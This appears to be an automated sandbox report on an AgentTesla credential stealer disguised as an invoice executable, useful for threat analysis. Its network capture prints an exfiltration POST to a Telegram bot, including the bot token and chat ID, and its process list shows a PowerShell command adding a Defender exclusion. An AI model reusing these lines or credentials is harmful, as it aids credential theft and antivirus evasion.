                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Reputation:high, very likely benign file
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                            Process:C:\Windows\System32\WerFault.exe
                                            File Type:MS Windows registry file, NT/2000 or above
                                            Category:dropped
                                            Size (bytes):1835008
                                            Entropy (8bit):4.296061047596634
                                            Encrypted:false
                                            SSDEEP:6144:b41fWRYkg7Di2vXoy00lWZgiWaaKxC44Q0NbuDs+v4XmBMZJh1VjL:U1/YCW2AoQ0NiaXwMHrVX
                                            MD5:C2A1328546B3D58F3813CD07BF1981E8
                                            SHA1:5E89CB057AE18DA08C1035ED0E5991888E8F552C
                                            SHA-256:419AFDC7E0E0AACE596C04C67644CA9E2E0098D7E26418C7721F75DEB11D4C1C
                                            SHA-512:0ABCB93228EFBF591C790C5AEBDE7B96575EF75D2BBD51A292F5B47C4548062779A0495104E5C21394FA143020B56F4B040B7CAE283E218D0136089F7E94D4BC
                                            Malicious:false
                                            Preview:regfG...G....\.Z.................... ....`......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtmnA..>.................................................................................................................................................................................................................................................................................................................................................,........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                            File type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                                            Entropy (8bit):7.9768800929644845
                                            TrID:
                                            • Win64 Executable GUI Net Framework (217006/5) 49.88%
                                            • Win64 Executable GUI (202006/5) 46.43%
                                            • Win64 Executable (generic) (12005/4) 2.76%
                                            • Generic Win/DOS Executable (2004/3) 0.46%
                                            • DOS Executable Generic (2002/1) 0.46%
                                            File name:COMMERCIAL INVOICE - BL - AWB 7032805642.exe
                                            File size:622'089 bytes
                                            MD5:7831435dbf79df5631126a63a722cf35
                                            SHA1:2380acbc54642882a4a3ebaa0a892eda4ea50b96
                                            SHA256:b4c52779d09ea4edabef9ef75c2756cdd9a1fc0c10564ea7cd153ca223d0a9d8
                                            SHA512:355396d92d844bc72998588bb97b61379b7799ca3b8cb1a8101ed09fc83c2999b7c6f7a820272efe860f2cf22aaf27f62320e543b7afece79df9e8e3e4c7d070
                                            SSDEEP:12288:U0p92TpQ1USCgfrSAOsWmjWh/DEzliFDwKM7Z0l8i7ZPcflAAky+:/P8plSf2AOuGDbFDzM0q4Zkfqfy+
                                            TLSH:C9D42387F1CD841AD9DC277B4069B5D02BB6D1052C03973D5FAD024E696B7E0CBE2B92
                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...&............."...0. l............... ....@...... ....................................`................................
                                            Icon Hash:6c693168c8e0e0b0
                                            Entrypoint:0x400000
                                            Entrypoint Section:
                                            Digitally signed:false
                                            Imagebase:0x400000
                                            Subsystem:windows gui
                                            Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                            DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                            Time Stamp:0xD9A1AC26 [Thu Sep 13 20:27:18 2085 UTC]
                                            TLS Callbacks:
                                            CLR (.Net) Version:
                                            OS Version Major:4
                                            OS Version Minor:0
                                            File Version Major:4
                                            File Version Minor:0
                                            Subsystem Version Major:4
                                            Subsystem Version Minor:0
                                            Import Hash:
                                            Instruction
                                            dec ebp
                                            pop edx
                                            nop
                                            add byte ptr [ebx], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax+eax], al
                                            add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xa000 | 0x1588 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x8c04 | 0x1c | .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2000 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x6c20 | 0x6e00 | 979248955b7f436231ce51aa98a51027 | False | 0.4863991477272727 | data | 5.655166343756366 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0xa000 | 0x1588 | 0x1600 | c2397d043b091e2d8db31e07aef7bae6 | False | 0.455078125 | data | 5.152262743776927 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xa114 | 0xc88 | Device independent bitmap graphic, 32 x 48 x 32, image size 3072 | | | 0.5819825436408977
RT_GROUP_ICON | 0xad9c | 0x14 | data | | | 1.05
RT_VERSION | 0xadb0 | 0x3ec | data | | | 0.48804780876494025
RT_VERSION | 0xb19c | 0x3ec | data | English | United States | 0.48804780876494025
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
05/23/24-20:22:01.486017 | TCP | 2851779 | ETPRO TROJAN Agent Tesla Telegram Exfil | 49711 | 443 | 192.168.2.10 | 149.154.167.220
Timestamp | Source Port | Dest Port | Source IP | Dest IP
May 23, 2024 20:22:00.408252001 CEST | 49711 | 443 | 192.168.2.10 | 149.154.167.220
May 23, 2024 20:22:00.408340931 CEST | 443 | 49711 | 149.154.167.220 | 192.168.2.10
May 23, 2024 20:22:00.408423901 CEST | 49711 | 443 | 192.168.2.10 | 149.154.167.220
May 23, 2024 20:22:00.414985895 CEST | 49711 | 443 | 192.168.2.10 | 149.154.167.220
May 23, 2024 20:22:00.415024042 CEST | 443 | 49711 | 149.154.167.220 | 192.168.2.10
May 23, 2024 20:22:01.188023090 CEST | 443 | 49711 | 149.154.167.220 | 192.168.2.10
May 23, 2024 20:22:01.188112974 CEST | 49711 | 443 | 192.168.2.10 | 149.154.167.220
May 23, 2024 20:22:01.191978931 CEST | 49711 | 443 | 192.168.2.10 | 149.154.167.220
May 23, 2024 20:22:01.191991091 CEST | 443 | 49711 | 149.154.167.220 | 192.168.2.10
May 23, 2024 20:22:01.192308903 CEST | 443 | 49711 | 149.154.167.220 | 192.168.2.10
May 23, 2024 20:22:01.283004999 CEST | 49711 | 443 | 192.168.2.10 | 149.154.167.220
May 23, 2024 20:22:01.326492071 CEST | 443 | 49711 | 149.154.167.220 | 192.168.2.10
May 23, 2024 20:22:01.485577106 CEST | 443 | 49711 | 149.154.167.220 | 192.168.2.10
May 23, 2024 20:22:01.485946894 CEST | 49711 | 443 | 192.168.2.10 | 149.154.167.220
May 23, 2024 20:22:01.485974073 CEST | 443 | 49711 | 149.154.167.220 | 192.168.2.10
May 23, 2024 20:22:01.701520920 CEST | 443 | 49711 | 149.154.167.220 | 192.168.2.10
May 23, 2024 20:22:01.706832886 CEST | 443 | 49711 | 149.154.167.220 | 192.168.2.10
May 23, 2024 20:22:01.707062006 CEST | 49711 | 443 | 192.168.2.10 | 149.154.167.220
May 23, 2024 20:22:01.710143089 CEST | 49711 | 443 | 192.168.2.10 | 149.154.167.220
Timestamp | Source Port | Dest Port | Source IP | Dest IP
May 23, 2024 20:22:00.384430885 CEST | 52182 | 53 | 192.168.2.10 | 1.1.1.1
May 23, 2024 20:22:00.401535988 CEST | 53 | 52182 | 1.1.1.1 | 192.168.2.10
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
May 23, 2024 20:22:00.384430885 CEST | 192.168.2.10 | 1.1.1.1 | 0x7466 | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
May 23, 2024 20:22:00.401535988 CEST | 1.1.1.1 | 192.168.2.10 | 0x7466 | No error (0) | api.telegram.org | | 149.154.167.220 | A (IP address) | IN (0x0001) | false
                                            • api.telegram.org
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.10 | 49711 | 149.154.167.220 | 443 | 7204 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
Timestamp | Bytes transferred | Direction | Data
2024-05-23 18:22:01 UTC | 260 | OUT | POST /bot6521856051:AAE_VqJACYh8GJnmBCYkrp8n7Ax0fW5fJ5s/sendDocument HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------------8dc7b33b51b57f3
Host: api.telegram.org
Content-Length: 912
Expect: 100-continue
Connection: Keep-Alive
2024-05-23 18:22:01 UTC | 25 | IN | HTTP/1.1 100 Continue
2024-05-23 18:22:01 UTC | 912 | OUT | Data Raw: (hex dump of the 912-byte multipart body omitted)
                                            Data Ascii: -----------------------------8dc7b33b51b57f3Content-Disposition: form-data; name="chat_id"6392451645-----------------------------8dc7b33b51b57f3Content-Disposition: form-data; name="caption"New PW Recovered!Time: 05/23/2024 14:21:59User
2024-05-23 18:22:01 UTC | 402 | IN | HTTP/1.1 400 Bad Request
                                            Server: nginx/1.18.0
                                            Date: Thu, 23 May 2024 18:22:01 GMT
                                            Content-Type: application/json
                                            Content-Length: 56
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            {"ok":false,"error_code":400,"description":"Logged out"}


                                            Target ID:0
                                            Start time:14:21:52
                                            Start date:23/05/2024
                                            Path:C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exe
                                            Wow64 process (32bit):false
                                            Commandline:"C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exe"
                                            Imagebase:0x19863840000
                                            File size:622'089 bytes
                                            MD5 hash:7831435DBF79DF5631126A63A722CF35
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.1330921589.0000019865ABB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1331684482.00000198756F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.1331684482.00000198756F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.1331684482.00000198756F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            Reputation:low
                                            Has exited:true

                                            Target ID:2
                                            Start time:14:21:56
                                            Start date:23/05/2024
                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            Wow64 process (32bit):false
                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exe" -Force
                                            Imagebase:0x7ff7b2bb0000
                                            File size:452'608 bytes
                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:3
                                            Start time:14:21:56
                                            Start date:23/05/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff620390000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:4
                                            Start time:14:21:56
                                            Start date:23/05/2024
                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                                            Imagebase:0x820000
                                            File size:43'008 bytes
                                            MD5 hash:9827FF3CDF4B83F9C86354606736CA9C
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.2464175604.0000000002C3E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.2464175604.0000000002C5A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.2460982055.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.2460982055.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000004.00000002.2460982055.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.2464175604.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.2464175604.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000004.00000002.2464175604.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            Reputation:moderate
                                            Has exited:false

                                            Target ID:5
                                            Start time:14:21:56
                                            Start date:23/05/2024
                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                            Wow64 process (32bit):false
                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                                            Imagebase:0x950000
                                            File size:43'008 bytes
                                            MD5 hash:9827FF3CDF4B83F9C86354606736CA9C
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:moderate
                                            Has exited:true

                                            Target ID:8
                                            Start time:14:21:57
                                            Start date:23/05/2024
                                            Path:C:\Windows\System32\WerFault.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\WerFault.exe -u -p 3648 -s 1124
                                            Imagebase:0x7ff690230000
                                            File size:570'736 bytes
                                            MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 7nu$ 7nu
                                              • API String ID: 0-97546710
                                              • Opcode ID: 50853c5738567d0796c29102770b64083dc2d398f22154c596de0c1ac5cb60b4
                                              • Instruction ID: 5266f7cfa920e6c0f53cbf6f06b814a598e86aa18c6dc635fb6a91b777567868
                                              • Opcode Fuzzy Hash: 50853c5738567d0796c29102770b64083dc2d398f22154c596de0c1ac5cb60b4
                                              • Instruction Fuzzy Hash: F132043060DA4A8FD75AEB2C9464764B7E1FF89325B5841BEC04ACB693CE24EC56C790
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: H$x6nu
                                              • API String ID: 0-871658157
                                              • Opcode ID: 8827126061f4c4ef8f72aef1ecd64baed8c9d689d459dca497f7cadaa4fc4095
                                              • Instruction ID: f949cdf65ee1cd3ad059bbff71c8e20fd6199be0851bc1a4cff9ad087d3f214e
                                              • Opcode Fuzzy Hash: 8827126061f4c4ef8f72aef1ecd64baed8c9d689d459dca497f7cadaa4fc4095
                                              • Instruction Fuzzy Hash: 3771E53070C9094FEB98FE6C9454AB673D1FF6837079401BAE40EC72A6DE64EC528790
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: [nu$ [nu
                                              • API String ID: 0-3277452902
                                              • Opcode ID: ed85fbd4f34efde6736dd947d1724cccfe057bd05f0dbe7127d47786015dee89
                                              • Instruction ID: e7e4100acf182dc53eeb59dd757f9c2fdc3bde6af9215711892e468095af1c43
                                              • Opcode Fuzzy Hash: ed85fbd4f34efde6736dd947d1724cccfe057bd05f0dbe7127d47786015dee89
                                              • Instruction Fuzzy Hash: 9F51D5B070DA458FD34CAF38846A679BBE0FF5A32174541BEC04AC76A3DE69A8028740
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: wL_H$x6nu
                                              • API String ID: 0-1532110656
                                              • Opcode ID: 6a4d54b2ec4e328ffec76ebfbc7a9da953793c83532b258e1f66b48c4570e669
                                              • Instruction ID: 36f83ffbb03e5548f8674ddcb3ebc2c11ea96a19db2be7fe8e5b3bf49dd8243a
                                              • Opcode Fuzzy Hash: 6a4d54b2ec4e328ffec76ebfbc7a9da953793c83532b258e1f66b48c4570e669
                                              • Instruction Fuzzy Hash: B831D62170DE0A4FE798FE6D54996B5B3C5EF5D371B40007AD50DC3292DE55EC528390
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: M_^$M_^'
                                              • API String ID: 0-2404277652
                                              • Opcode ID: d19f1736e7940f0318aeb44e137a651478470d31e6f044ec13d2ad1039571298
                                              • Instruction ID: 813dd6db6e867623675822fb9efd86f1fc71bd27166046076e57a41b82bb3350
                                              • Opcode Fuzzy Hash: d19f1736e7940f0318aeb44e137a651478470d31e6f044ec13d2ad1039571298
                                              • Instruction Fuzzy Hash: 2E31097690A6594BD701FB78FC913E8F790EF42375F48037AD08C8B193ED6874958694
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: "cx
                                              • API String ID: 0-3384518517
                                              • Opcode ID: 980892884a83f250575c77307129502bce038ae5c77c5e712695277f5f645ac0
                                              • Instruction ID: d2604fd9def260769212c1ee65c56ba63b89c237758b06b2cf2a44c9dea5a88c
                                              • Opcode Fuzzy Hash: 980892884a83f250575c77307129502bce038ae5c77c5e712695277f5f645ac0
                                              • Instruction Fuzzy Hash: 1532D23160CA4A4FE754FF28E4907E5B7E1EF85375F54427AC049CA182DE69B886CBA0
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: ,K_L
                                              • API String ID: 0-4112966043
                                              • Opcode ID: dad3cc39c2588d4f392981ccb826ca8104a6557570cd7e0fe3b587e3bc3b846c
                                              • Instruction ID: 5219826217642d22ee71f1f189fc7e637fe7976d85e6a6279e9ae20635345c0d
                                              • Opcode Fuzzy Hash: dad3cc39c2588d4f392981ccb826ca8104a6557570cd7e0fe3b587e3bc3b846c
                                              • Instruction Fuzzy Hash: 2212603060CA098FDB88EB18D495A65F3E2FF99324B5442A9D04EC7696CE75FC52CB81
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: x6nu
                                              • API String ID: 0-1949830615
                                              • Opcode ID: d85ce7eaf39970e6e2273654ae6843d1e1122c98640846e54180882e39928b96
                                              • Instruction ID: 1a46d6587a30fefe5c89b599b7f20ae74eef23e403dfd518c86d14e7d54cc95b
                                              • Opcode Fuzzy Hash: d85ce7eaf39970e6e2273654ae6843d1e1122c98640846e54180882e39928b96
                                              • Instruction Fuzzy Hash: 67D1E630B0CA094FE768EF1C94696B5B3D1FFA9370B54027AE44EC7296DE65EC528390
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: +N_^
                                              • API String ID: 0-2642635393
                                              • Opcode ID: b5f2df893fcedee99bbee1ddc7d82d68f4627f6b8cd445c351c8b1f03d30ad4f
                                              • Instruction ID: 6ba04a95f8f51e408517dfeff4856a13152a7de07f01426a76dc51503c0ea10b
                                              • Opcode Fuzzy Hash: b5f2df893fcedee99bbee1ddc7d82d68f4627f6b8cd445c351c8b1f03d30ad4f
                                              • Instruction Fuzzy Hash: C88105B120DA924FD3056B6CBC143D9FBA0FF46366B0842BBC198C6187DE24F92683C5
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: +N_^
                                              • API String ID: 0-2642635393
                                              • Opcode ID: 4c455d51ac578827f407fa7fb50c661b40eba54a96110a8a94ceed355ac90dab
                                              • Instruction ID: 354cca0bd04d5b54f10914c5dfb332ffe5bdec0c084a9f5d99aed03c05a59b0d
                                              • Opcode Fuzzy Hash: 4c455d51ac578827f407fa7fb50c661b40eba54a96110a8a94ceed355ac90dab
                                              • Instruction Fuzzy Hash: 3C81E5B130DA924FD305676DBC143E9FBA0FF46366B0842BBD198C6187DE24B92683C5
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: L
                                              • API String ID: 0-2909332022
                                              • Opcode ID: 201dacd25e475d44ec9cae422c7b08f12bbb3f00d9ae071882adb356a4d3d409
                                              • Instruction ID: ca94c0ccfe2c65a4a6ff6e0f3a12ed8199412288ef0192b0cf0ca6163101061d
                                              • Opcode Fuzzy Hash: 201dacd25e475d44ec9cae422c7b08f12bbb3f00d9ae071882adb356a4d3d409
                                              • Instruction Fuzzy Hash: 8251D631A1CE064FE768AB1CA419675B3C2EFA8370F54427EE84EC3296DE65A85242C5
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: Znu
                                              • API String ID: 0-2439342474
                                              • Opcode ID: 90ebcda5ef3a81f8938504849890487945b8bbef1c79f6b18340af236ebc6ad9
                                              • Instruction ID: 1296fe4047d286c9af3d8ac186445868ce21e78d85ad0bc864bbedb1cc445c42
                                              • Opcode Fuzzy Hash: 90ebcda5ef3a81f8938504849890487945b8bbef1c79f6b18340af236ebc6ad9
                                              • Instruction Fuzzy Hash: 8551F431A0DA454FE759BB3C94166B9B7E2FF89371B1442BEE04EC71D3DE2898428781
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
